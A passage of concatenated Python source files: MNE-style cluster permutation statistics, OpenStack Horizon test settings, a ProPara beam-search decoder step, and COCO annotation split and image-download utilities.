T_obs : array of shape [n_tests]
T-statistic observed for all variables
clusters : list
List type defined by out_type above.
cluster_pv : array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
if threshold is None:
p_thresh = 0.05 / (1 + (tail == 0))
n_samples = len(X)
threshold = -stats.distributions.t.ppf(p_thresh, n_samples - 1)
if np.sign(tail) < 0:
threshold = -threshold
X = [X] # for one sample only one data array
return _permutation_cluster_test(X=X,
threshold=threshold,
n_permutations=n_permutations,
tail=tail, stat_fun=stat_fun,
connectivity=connectivity,
verbose=verbose,
n_jobs=n_jobs, seed=seed,
max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
permutation_cluster_1samp_test.__test__ = False
@verbose
def spatio_temporal_cluster_1samp_test(X, threshold=None,
n_permutations=1024, tail=0,
stat_fun=ttest_1samp_no_p,
connectivity=None, verbose=None,
n_jobs=1, seed=None, max_step=1,
spatial_exclude=None, step_down_p=0,
t_power=1, out_type='indices',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level 1 sample T-test for spatio-temporal data
This function provides a convenient wrapper for data organized in the form
(observations x time x space) to use permutation_cluster_1samp_test.
Parameters
----------
X : array
Array of shape observations x time x vertices.
threshold : float | dict | None
If threshold is None, it will choose a t-threshold equivalent to
p < 0.05 for the given number of (within-subject) observations.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : function
Function used to compute the statistical map.
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
This matrix must be square with dimension (n_vertices * n_times) or
(n_vertices). Default is None, i.e, a regular lattice connectivity.
Use square n_vertices matrix for datasets with a large temporal
extent to save on memory and computation time.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
Note that if n_permutations >= 2^(n_samples) [or (2^(n_samples-1)) for
two-tailed tests], this value will be ignored since an exact test
(full permutation test) will be performed.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
spatial_exclude : list of int or None
List of spatial indices to exclude from clustering.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
check_disjoint : bool
If True, the connectivity matrix (or list) will be examined to
determine of it can be separated into disjoint sets. In some cases
(usually with connectivity as a list and many "time" points), this
can lead to faster clustering, but results should be identical.
buffer_size: int or None
The statistics will be computed for blocks of variables of size
"buffer_size" at a time. This is option significantly reduces the
memory requirements when n_jobs > 1 and memory sharing between
processes is enabled (see set_cache_dir()), as X will be shared
between processes and each process only needs to allocate space
for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables.
clusters : list
List type defined by out_type above.
cluster_pv: array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
TFCE originally described in Smith/Nichols (2009),
"Threshold-free cluster enhancement: Addressing problems of
smoothing, threshold dependence, and localisation in cluster
inference", NeuroImage 44 (2009) 83-98.
"""
n_samples, n_times, n_vertices = X.shape
# convert spatial_exclude before passing on if necessary
if spatial_exclude is not None:
exclude = _st_mask_from_s_inds(n_times, n_vertices,
spatial_exclude, True)
else:
exclude = None
# do the heavy lifting
out = permutation_cluster_1samp_test(X, threshold=threshold,
stat_fun=stat_fun, tail=tail,
n_permutations=n_permutations,
connectivity=connectivity,
n_jobs=n_jobs, seed=seed,
max_step=max_step, exclude=exclude,
step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
return out
spatio_temporal_cluster_1samp_test.__test__ = False
@verbose
def spatio_temporal_cluster_test(X, threshold=1.67, n_permutations=1024,
tail=0, stat_fun=f_oneway,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, spatial_exclude=None,
step_down_p=0, t_power=1, out_type='indices',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level test for spatio-temporal data
This function provides a convenient wrapper for data organized in the form
(observations x time x space) to use permutation_cluster_test.
Parameters
----------
X: list of arrays
Array of shape (observations, time, vertices) in each group.
threshold: float
The threshold for the statistic.
n_permutations: int
See permutation_cluster_test.
tail : -1 or 0 or 1 (default = 0)
See permutation_cluster_test.
stat_fun : function
function called to calculate statistics, must accept 1d-arrays as
arguments (default: scipy.stats.f_oneway)
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
Default is None, i.e, a regular lattice connectivity.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
spatial_exclude : list of int or None
List of spatial indices to exclude from clustering.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually f-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
check_disjoint : bool
If True, the connectivity matrix (or list) will be examined to
determine of it can be separated into disjoint sets. In some cases
(usually with connectivity as a list and many "time" points), this
can lead to faster clustering, but results should be identical.
buffer_size: int or None
The statistics will be computed for blocks of variables of size
"buffer_size" at a time. This is option significantly reduces the
memory requirements when n_jobs > 1 and memory sharing between
processes is enabled (see set_cache_dir()), as X will be shared
between processes and each process only needs to allocate space
for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables
clusters : list
List type defined by out_type above.
cluster_pv: array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
n_samples, n_times, n_vertices = X[0].shape
# convert spatial_exclude before passing on if necessary
if spatial_exclude is not None:
exclude = _st_mask_from_s_inds(n_times, n_vertices,
spatial_exclude, True)
else:
exclude = None
# do the heavy lifting
out = permutation_cluster_test(X, threshold=threshold,
stat_fun=stat_fun, tail=tail,
n_permutations=n_permutations,
connectivity=connectivity, n_jobs=n_jobs,
seed=seed, max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
return out
spatio_temporal_cluster_test.__test__ = False
def _st_mask_from_s_inds(n_times, n_vertices, vertices, set_as=True):
"""This function returns a boolean mask vector to apply to a spatio-
temporal connectivity matrix (n_times * n_vertices square) to include (or
exclude) certain spatial coordinates. This is useful for excluding certain
regions from analysis (e.g., medial wall vertices).
Parameters
----------
n_times : int
Number of time points.
n_vertices : int
Number of spatial points.
vertices : list or array of int
Vertex numbers to set.
set_as : bool
If True, all points except "vertices" are set to False (inclusion).
If False, all points except "vertices" are set to True (exclusion).
Returns
-------
mask : array of bool
A (n_times * n_vertices) array of boolean values for masking
"""
mask = np.zeros((n_times, n_vertices), dtype=bool)
mask[:, vertices] = True
mask = mask.ravel()
if set_as is False:
mask = np.logical_not(mask)
return mask
@verbose
def _get_partitions_from_connectivity(connectivity, n_times, verbose=None):
"""Use indices to specify disjoint subsets (e.g., hemispheres) based on
connectivity"""
if isinstance(connectivity, list):
test = np.ones(len(connectivity))
test_conn = np.zeros((len(connectivity), len(connectivity)),
dtype='bool')
for vi in range(len(connectivity)):
test_conn[connectivity[vi], vi] = True
test_conn = sparse.coo_matrix(test_conn, dtype='float')
else:
test = np.ones(connectivity.shape[0])
test_conn = connectivity
part_clusts = _find_clusters(test, 0, 1, test_conn)[0]
if len(part_clusts) > 1:
logger.info('%i disjoint connectivity sets found'
% len(part_clusts))
partitions = np.zeros(len(test), dtype='int')
for ii, pc in enumerate(part_clusts):
partitions[pc] = ii
if isinstance(connectivity, list):
partitions = np.tile(partitions, n_times)
else:
logger.info('No disjoint connectivity sets found')
partitions = None
return partitions
def _reshape_clusters(clusters, sample_shape):
"""Reshape cluster masks or indices to be of the correct shape"""
# format of the bool mask and indices are ndarrays
if len(clusters) > 0 and isinstance(clusters[0], np.ndarray):
if clusters[0].dtype == bool: # format of mask
clusters = [c.reshape(sample_shape) for c in clusters]
else: # format of indices
clusters = [unravel_index(c, sample_shape) for c in clusters]
return clusters
def summarize_clusters_stc(clu, p_thresh=0.05, tstep=1e-3, tmin=0,
subject='fsaverage', vertices=None, vertno=None):
""" Assemble summary SourceEstimate from spatiotemporal cluster results
This helps visualizing results from spatio-temporal-clustering
permutation tests
Parameters
----------
clu : tuple
the output from clustering permutation tests.
p_thresh : float
The significance threshold for inclusion of clusters.
tstep : float
The temporal difference between two time samples.
tmin : float | int
The time of the first sample.
subject : str
The name of the subject.
vertno : list of arrays | None
The vertex numbers associated with the source space locations. Defaults
to None. If None, equals ```[np.arange(10242), np.arange(10242)]```.
Returns
-------
out : instance of SourceEstimate
"""
if vertno is not None:
warnings.warn("The vertno parameter is deprecated and will be removed "
"in version 0.11. Use vertices instead.",
DeprecationWarning)
vertices = vertno
if vertices is None:
vertices = [np.arange(10242), np.arange(10242)]
T_obs, clusters, clu_pvals, _ = clu
n_times, n_vertices = T_obs.shape
good_cluster_inds = np.where(clu_pvals < p_thresh)[0]
# Build a convenient representation of each cluster, where each
# cluster becomes a "time point" in the SourceEstimate
if len(good_cluster_inds) > 0:
data = np.zeros((n_vertices, n_times))
data_summary = np.zeros((n_vertices, len(good_cluster_inds) + 1))
for ii, cluster_ind in enumerate(good_cluster_inds):
data.fill(0)
v_inds = clusters[cluster_ind][1]
t_inds = clusters[cluster_ind][0]
data[v_inds, t_inds] = T_obs[t_inds, v_inds]
# Store a nice visualization of the cluster by summing across time
data = np.sign(data) * np.logical_not(data == 0) * tstep
data_summary[:, ii + 1] = 1e3 * np.sum(data, axis=1)
# Make the first "time point" a sum across all clusters for easy
# visualization
data_summary[:, 0] = np.sum(data_summary, axis=1)
return SourceEstimate(data_summary, vertices, tmin=tmin, tstep=tstep,
subject=subject)
else:
raise RuntimeError('No significant clusters available. Please adjust '
'your threshold or check your statistical '
'analysis.')
|
the-stack_0_19833 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from django.utils.translation import pgettext_lazy
from horizon.test.settings import * # noqa
from horizon.utils import secret_key
from openstack_dashboard import exceptions
from horizon.utils.escape import monkeypatch_escape
# this is used to protect from client XSS attacks, but it's worth
# enabling in our test setup to find any issues it might cause
monkeypatch_escape()
from openstack_dashboard.utils import settings as settings_utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.abspath(os.path.join(TEST_DIR, ".."))
MEDIA_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '..', 'media'))
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '..', 'static'))
STATIC_URL = '/static/'
WEBROOT = '/'
SECRET_KEY = secret_key.generate_or_read_from_file(
os.path.join(TEST_DIR, '.secret_key_store'))
ROOT_URLCONF = 'openstack_dashboard.test.urls'
TEMPLATES[0]['DIRS'] = [
os.path.join(TEST_DIR, 'templates')
]
TEMPLATES[0]['OPTIONS']['context_processors'].append(
'openstack_dashboard.context_processors.openstack'
)
CUSTOM_THEME_PATH = 'themes/default'
# 'key', 'label', 'path'
AVAILABLE_THEMES = [
(
'default',
pgettext_lazy('Default style theme', 'Default'),
'themes/default'
), (
'material',
pgettext_lazy("Google's Material Design style theme", "Material"),
'themes/material'
),
]
# Theme Static Directory
THEME_COLLECTION_DIR = 'themes'
COMPRESS_OFFLINE = False
INSTALLED_APPS = (
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.messages',
'django.contrib.humanize',
'django_nose',
'openstack_auth',
'compressor',
'horizon',
'openstack_dashboard',
)
AUTHENTICATION_BACKENDS = ('openstack_auth.backend.KeystoneBackend',)
SITE_BRANDING = 'OpenStack'
HORIZON_CONFIG = {
"password_validator": {
"regex": '^.{8,18}$',
"help_text": "Password must be between 8 and 18 characters."
},
'user_home': None,
'help_url': "http://docs.openstack.org",
'exceptions': {'recoverable': exceptions.RECOVERABLE,
'not_found': exceptions.NOT_FOUND,
'unauthorized': exceptions.UNAUTHORIZED},
'angular_modules': [],
'js_files': [],
}
ANGULAR_FEATURES = {
'images_panel': False # Use the legacy panel so unit tests are still run
}
STATICFILES_DIRS = settings_utils.get_xstatic_dirs(
settings_utils.BASE_XSTATIC_MODULES, HORIZON_CONFIG
)
# Load the pluggable dashboard settings
import openstack_dashboard.enabled
INSTALLED_APPS = list(INSTALLED_APPS) # Make sure it's mutable
settings_utils.update_dashboards(
[
openstack_dashboard.enabled,
],
HORIZON_CONFIG,
INSTALLED_APPS,
)
# Remove this when the legacy panel is removed, along with its tests and
# the stacks MappingsTests are updated with the new URL path.
HORIZON_CONFIG['swift_panel'] = 'legacy'
settings_utils.find_static_files(HORIZON_CONFIG, AVAILABLE_THEMES,
THEME_COLLECTION_DIR, ROOT_PATH)
# Set to 'legacy' or 'direct' to allow users to upload images to glance via
# Horizon server. When enabled, a file form field will appear on the create
# image form. If set to 'off', there will be no file form field on the create
# image form. See documentation for deployment considerations.
HORIZON_IMAGES_UPLOAD_MODE = 'legacy'
AVAILABLE_REGIONS = [
('http://localhost:5000/v2.0', 'local'),
('http://remote:5000/v2.0', 'remote'),
]
OPENSTACK_API_VERSIONS = {
"identity": 3,
"image": 2
}
OPENSTACK_KEYSTONE_URL = "http://localhost:5000/v2.0"
OPENSTACK_KEYSTONE_DEFAULT_ROLE = "_member_"
OPENSTACK_KEYSTONE_MULTIDOMAIN_SUPPORT = True
OPENSTACK_KEYSTONE_DEFAULT_DOMAIN = 'test_domain'
OPENSTACK_KEYSTONE_FEDERATION_MANAGEMENT = True
OPENSTACK_KEYSTONE_BACKEND = {
'name': 'native',
'can_edit_user': True,
'can_edit_group': True,
'can_edit_project': True,
'can_edit_domain': True,
'can_edit_role': True
}
OPENSTACK_CINDER_FEATURES = {
'enable_backup': True,
}
OPENSTACK_NEUTRON_NETWORK = {
'enable_router': True,
'enable_quotas': False, # Enabled in specific tests only
# Parameters below (enable_lb, enable_firewall, enable_vpn)
# control if these panels are displayed or not,
# i.e. they only affect the navigation menu.
# These panels are registered even if enable_XXX is False,
# so we don't need to set them to True in most unit tests
# to avoid stubbing neutron extension check calls.
'enable_lb': False,
'enable_firewall': False,
'enable_vpn': False,
'profile_support': None,
'enable_distributed_router': False,
# 'profile_support': 'cisco'
}
OPENSTACK_HYPERVISOR_FEATURES = {
'can_set_mount_point': False,
'can_set_password': True,
}
OPENSTACK_IMAGE_BACKEND = {
'image_formats': [
('', 'Select format'),
('aki', 'AKI - Amazon Kernel Image'),
('ami', 'AMI - Amazon Machine Image'),
('ari', 'ARI - Amazon Ramdisk Image'),
('iso', 'ISO - Optical Disk Image'),
('qcow2', 'QCOW2 - QEMU Emulator'),
('raw', 'Raw'),
('vdi', 'VDI'),
('vhd', 'VHD'),
('vmdk', 'VMDK')
]
}
LOGGING['loggers'].update(
{
'openstack_dashboard': {
'handlers': ['test'],
'propagate': False,
},
'openstack_auth': {
'handlers': ['test'],
'propagate': False,
},
'novaclient': {
'handlers': ['test'],
'propagate': False,
},
'keystoneclient': {
'handlers': ['test'],
'propagate': False,
},
'glanceclient': {
'handlers': ['test'],
'propagate': False,
},
'neutronclient': {
'handlers': ['test'],
'propagate': False,
},
'iso8601': {
'handlers': ['null'],
'propagate': False,
},
}
)
SECURITY_GROUP_RULES = {
'all_tcp': {
'name': 'ALL TCP',
'ip_protocol': 'tcp',
'from_port': '1',
'to_port': '65535',
},
'http': {
'name': 'HTTP',
'ip_protocol': 'tcp',
'from_port': '80',
'to_port': '80',
},
}
NOSE_ARGS = ['--nocapture',
'--nologcapture',
'--cover-package=openstack_dashboard',
'--cover-inclusive',
'--all-modules']
POLICY_FILES_PATH = os.path.join(ROOT_PATH, "conf")
POLICY_FILES = {
'identity': 'keystone_policy.json',
'compute': 'nova_policy.json'
}
# The openstack_auth.user.Token object isn't JSON-serializable ATM
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
REST_API_SETTING_1 = 'foo'
REST_API_SETTING_2 = 'bar'
REST_API_SECURITY = 'SECURITY'
REST_API_REQUIRED_SETTINGS = ['REST_API_SETTING_1']
REST_API_ADDITIONAL_SETTINGS = ['REST_API_SETTING_2']
ALLOWED_PRIVATE_SUBNET_CIDR = {'ipv4': [], 'ipv6': []}
|
the-stack_0_19835 | import heapq
import logging
import torch
from allennlp.nn.decoding import DecoderStep
from propara.trainer_decoder.propara_decoder_state import ProParaDecoderState
from collections import defaultdict
from typing import List, Set, Dict
from overrides import overrides
from propara.trainer_decoder.action_scorer import ActionScorer
from propara.trainer_decoder.valid_action_generator import ValidActionGenerator, DummyConstrainedStepper, \
CommonsenseBasedActionGenerator
logger = logging.getLogger(__name__)
class ProParaDecoderStep(DecoderStep[ProParaDecoderState]):
def __init__(self,
action_scorer: ActionScorer,
valid_action_generator: ValidActionGenerator,
):
super(ProParaDecoderStep, self).__init__()
self._action_scorer = action_scorer
self._valid_action_generator = valid_action_generator
self._num_failures = 0
def change_action_scorer(self, new_action_scorer):
self._action_scorer = new_action_scorer
def get_action_scorer(self):
return self._action_scorer
def change_valid_action_generator(self, new_valid_action_generator):
self._valid_action_generator = new_valid_action_generator
def get_valid_action_generator(self):
return self._valid_action_generator
def set_num_participants(self, num_participants):
if isinstance(self._valid_action_generator, DummyConstrainedStepper) or \
isinstance(self._valid_action_generator, CommonsenseBasedActionGenerator):
self._valid_action_generator.set_num_participants(num_participants)
def set_num_steps(self, num_steps):
if isinstance(self._valid_action_generator, CommonsenseBasedActionGenerator):
self._valid_action_generator.set_num_steps(num_steps)
@overrides
def take_step(self,
state: ProParaDecoderState,
max_actions: int = None,
allowed_actions: List[Set] = None) -> List[ProParaDecoderState]:
"""
Parameters:
state: ``ProParaDecoderState``
The state (or group of states) from which to choose a next step.
max_actions: int
The beam size
allowed_actions: ``List[Set]``, optional (default = None)
Valid actions is dynamic per state, while allowed actions is defined up front
(e.g, list of labels such as CREATE DESTROY) for the entire .
The base class (DecoderStep) enforces the shape `batch x allowed_actions_for_any_participant`.
This is limiting because we need to specify allowed actions per participant
So we actually need: List[Set[Ubertuple]] instead of List[Set[int]].
Returns:
``List[ProParaDecoderState]``
the next states
"""
# Batch_index -> possible next states with their score.
# 'ProParaDecoderState' object does not support indexing,
# so we convert to a dictionary before sorting by score.
indexed_next_states: Dict[int, List[ProParaDecoderState]] = defaultdict(list)
if not allowed_actions:
allowed_actions = [None] * len(state.batch_indices)
# Generate a new state based on valid actions.
# state.start_values can be None, so do not loop over it.
for batch_index, action_hist, score, allowed_action in zip(state.batch_indices,
state.action_history,
state.score,
allowed_actions):
# Create many new ProParaDecoder states based on valid actions from the curr state.
# Do not group the new states into one ProParaDecoderState.
new_states = self.possible_states_from(batch_index,
state,
score,
# logits corresponding to the next step.
state.logit_tensor[batch_index][len(action_hist)],
action_hist,
allowed_action,
max_actions
)
# Prepare for sorting by grouping returned states by their batch index.
for new_state in new_states:
indexed_next_states[batch_index].append(new_state)
# Now, sort the states by score.
next_states: List[ProParaDecoderState] = ProParaDecoderStep. \
sort_states_by_score(indexed_next_states, max_actions)
return next_states
# Generate a list of states based on valid steps that can be taken from the current state.
# To create a state, append history and compute a score for the state (per participant).
def possible_states_from(self,
batch_index,
state,
state_score,
model_score,
action_history,
allowed_action,
max_actions) -> List[ProParaDecoderState]:
new_states: List[ProParaDecoderState] = []
scores_of_valid_actions = []
sum_scores_of_valid_actions = 0.
# In this function, one ProParaDecoderState contains exactly one state.
# valid actions contain one action per participant e.g., (0: None, 1:Create, 0:None).
(valid_actions, valid_actions_debug_info) = self._valid_action_generator.generate(action_history, state.metadata)
if allowed_action and list(allowed_action)[0] not in valid_actions:
self._num_failures += 1
# FIXME wrong score of the valid allowed action
for action in allowed_action:
valid_actions.append(action)
softmax_input = [] # Array of 1D tensors to be stacked for log(softmax)
for valid_action_id, valid_action in enumerate(valid_actions):
# Compute score per participant.
curr_scores_per_parti = (self._action_scorer.score_of(
action_history,
valid_action,
model_score,
state.metadata))
# participant wise score.
# It is unclear if we need to append the history of prev. participant wise scores.
# because we are already maintaining a score per state.
# scores_of_valid_actions.append(curr_scores_per_parti + previous_scores_per_participant)
scores_of_valid_actions.append(curr_scores_per_parti)
softmax_input.append(curr_scores_per_parti.sum()) # 1D Tensor
sum_scores_of_valid_actions += curr_scores_per_parti.sum()
curr_scores = torch.nn.functional.log_softmax(torch.cat(softmax_input), dim=-1)
# allowed valid action (that is part of the gold sequence)
for valid_action_id, valid_action in enumerate(valid_actions):
in_beam_search = state.metadata.get('in_beam_search', False)
valid_action_is_allowed = allowed_action and valid_action in allowed_action
if in_beam_search or valid_action_is_allowed:
# num participants should match.
# logit_tensor: (batch_size, num_sentences, num_participants, num_actions)
# assert len(new_scores) == state.logit_tensor.shape[2]
# lookup per participant score of this chosen valid_action_id.
unnorm_score_per_participant = scores_of_valid_actions[valid_action_id]
curr_score = curr_scores[valid_action_id]
# new state score = prev state score (must be maintained for backprop) + curr score
new_state_score = state_score + curr_score
# Note: We only construct new states for the chosen valid actions.
# For these new states, the group size is 1 (so we construct [batch_index] etc.).
new_state = ProParaDecoderState(
# Shape: [batch]
group_indices=[batch_index],
# Shape: [batch[step[participants_labels]]]
action_history=[action_history + [valid_action]],
# Shape: [batch[participant_label_score]]
participant_score_per_group=[unnorm_score_per_participant],
participants_embedding=state.participants_embedding,
logit_tensor=state.logit_tensor,
instance_id=state.instance_id,
metadata=state.metadata,
overall_score=[new_state_score] # score of the state.
# start_value was only needed for step 1.
)
new_states.append((-new_state_score.data[0], new_state))
new_states.sort(key=lambda pair: pair[0])
new_states = new_states[:max_actions]
return [pair[1] for pair in new_states]
@classmethod
def sort_states_by_score(
cls,
indexed_next_states,
max_actions
) -> List[ProParaDecoderState]:
next_states: List[ProParaDecoderState] = []
# state is of type ProParaDecoderState -- state has group size of 1
# sort these states based on state score (which is a list of autograd variables).
for batch_next_states in indexed_next_states.values():
sorted_next_states = [(-state.score[0].data[0], state) for state in batch_next_states]
sorted_next_states.sort(key=lambda x: x[0])
if max_actions is not None:
sorted_next_states = sorted_next_states[:max_actions]
next_states.extend(state[1] for state in sorted_next_states)
return next_states
|
the-stack_0_19838 | import numpy as np
from sklearn.model_selection import train_test_split
import funcy
from tabulate import tabulate
import coloredlogs, logging
from glob import glob
import itertools, os, json, urllib.request
from tqdm import tqdm
from os.path import join as opj
import cv2
coloredlogs.install()
logging.basicConfig(format='[%(asctime)s : %(message)s %(filename)s]',
log_colors='green', loglevel=logging.ERROR)
def check_instances_categories(file, annotations, class_names):
"""
#### category index should start from 1
"""
num_classes = len(class_names)
hist_bins = np.arange(num_classes + 1)
histogram = np.zeros((num_classes,))
for anno in annotations:
classes = np.asarray(
[anno["category_id"] - 1]
)
if len(classes):
assert classes.min() >= 0, f"Got an invalid category_id={classes.min()}"
assert (
classes.max() < num_classes
), f"Got an invalid category_id={classes.max()} for a dataset of {num_classes} classes"
histogram += np.histogram(classes, bins=hist_bins)[0]
N_COLS = min(6, len(class_names) * 2)
def short_name(x):
# make long class names shorter. useful for lvis
if len(x) > 13:
return x[:11] + ".."
return x
data = list(
itertools.chain(*[[short_name(class_names[i]), int(v)] for i, v in enumerate(histogram)])
)
total_num_instances = sum(data[1::2])
data.extend([None] * (N_COLS - (len(data) % N_COLS)))
if num_classes > 1:
data.extend(["total", total_num_instances])
data = itertools.zip_longest(*[data[i::N_COLS] for i in range(N_COLS)])
table = tabulate(
data,
headers=["category", "#instances"] * (N_COLS // 2),
tablefmt="pipe",
numalign="left",
stralign="center",
)
logging.basicConfig(format='[%(asctime)s : %(message)s %(filename)s]',
log_colors='green', loglevel=logging.INFO)
logging.info('\n' + '\033[92m' + 'Categories and Instances in the ' + file + ':' + '\033[96m' + '\n' + table)
def save_coco(file, images, annotations, categories):
check_instances_categories(file, annotations, [category['name'] for category in categories])
with open(file, 'wt') as coco:
json.dump({'images': images, 'annotations': annotations, 'categories': categories}, coco, indent=2,
sort_keys=False)
def filter_annotations(annotations, images):
image_ids = funcy.lmap(lambda i: int(i['id']), images)
return funcy.lfilter(lambda a: int(a['image_id']) in image_ids, annotations)
def dataset_split(annotation_file, train_val_test, ratio):
with open(annotation_file, 'rt') as annotations:
coco = json.load(annotations)
images = coco['images']
annotations = coco['annotations']
categories = coco['categories']
images_with_annotations = funcy.lmap(lambda a: int(a['image_id']), annotations)
images = funcy.lremove(lambda i: i['id'] not in images_with_annotations, images)
images_trn_val_tst = {}
images_trn_val_tst["train_val"], images_trn_val_tst["test"] = train_test_split(images,
train_size=ratio)
images_trn_val_tst["train"], images_trn_val_tst["val"] = train_test_split(
images_trn_val_tst["train_val"], train_size=ratio)
for set_nms in train_val_test:
img_ids = images_trn_val_tst[set_nms.split('.')[0]]
save_coco(opj(os.path.abspath(os.path.dirname(annotation_file) + os.path.sep + "."), set_nms),
img_ids, filter_annotations(annotations, img_ids),
categories)
def check_download_images(imgs_info):
download_error = {}
for num, img_info in enumerate(tqdm(imgs_info)):
image_path = img_info['image_path']
if isinstance(img_info['url'], str):
image_url = [''.join(img_info['url'])]
else:
image_url = img_info['url']
download_sucess = False
f_path = os.path.abspath(os.path.dirname(image_path) + os.path.sep + ".")
if os.access(image_path, mode=os.R_OK):
continue
else:
os.makedirs(f_path, exist_ok=True)
for url in image_url:
try:
urllib.request.urlretrieve(url, image_path)
download_sucess = True
break
except Exception as e:
continue
if download_sucess is False:
download_error[img_info['file_name']] = image_path
continue
img = cv2.imread(image_path, -1)
dim = (img.shape[1], img.shape[0])
dim_origin = (img_info['width'], img_info['height'])
if dim != dim_origin:
img = cv2.resize(img, dim_origin, cv2.INTER_AREA)
cv2.imwrite(image_path, img)
images_with_expired_urls = list(download_error.values())
if len(images_with_expired_urls) != 0:
for img_dir in images_with_expired_urls:
print('\n' + 'The image " ' + img_dir + ' " is not exist.')
logging.info('\n' + 'You need to download those images by yourself to: ' + f_path + '\n')
else:
logging.info('\n' + 'All the needed images have been downloaded to: ' + f_path + '\n')
# hints: provide with links and tell users which datasets they need to download and where to download them
def check_anno_index(path_to_anno):
with open(path_to_anno) as coco_format_anno:
anno = json.load(coco_format_anno)
annotations = anno['annotations']
categories = anno['categories']
index_start_zero = False
if categories[0]['id'] != 0:
return index_start_zero, anno
else:
index_start_zero = True
for category in categories:
category['id'] += 1
for annotation in annotations:
annotation['category_id'] += 1
anno_sorted_index = {
"images": anno['images'],
"annotations": annotations,
"categories": categories
}
return index_start_zero, anno_sorted_index
def checkpoint_verify(work_dir, ckpt_file=None):
if ckpt_file is not None:
ckpt_file = os.path.join(work_dir, ckpt_file)
else:
for ckpt_file in glob(work_dir + "best_bbox_mAP_epoch_*.pth"):
if os.path.isfile(ckpt_file):
return os.path.abspath(ckpt_file)
ckpt_file = os.path.join(work_dir, "latest.pth")
assert os.path.isfile(ckpt_file), '{} not exist'.format(ckpt_file)
return os.path.abspath(ckpt_file)
def images_categories_distribution(path_to_anno):
"""
analysis the images and categories distributions of mixedDatasets
1. draw a pie figure for images distribution
2. draw a histogram for categories distribution
3. .. other better visualization and analysis for mixedDatasets
4. could also be used to analysis the detected performance in different datasets
Note: which need to the source of specific image
"""
pass
def image_from_google_drive(img_info):
"""
